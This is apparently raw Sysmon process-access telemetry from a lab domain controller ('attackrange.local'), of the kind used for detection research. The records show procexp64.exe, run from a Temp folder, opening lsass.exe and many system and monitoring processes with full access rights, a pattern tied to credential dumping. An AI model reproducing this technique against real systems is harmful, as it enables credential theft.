15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792032Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792031Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792030Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792029Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792028Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792027Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792026Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792025Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792024Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792023Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792022Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792021Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792020Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792019Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792018Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792017Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792016Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792015Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792014Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792013Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792012Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792011Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792010Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792009Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792008Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792007Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792006Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792005Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792004Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792003Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792002Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792001Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792000Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791999Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791998Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791997Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791996Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.782{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791995Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 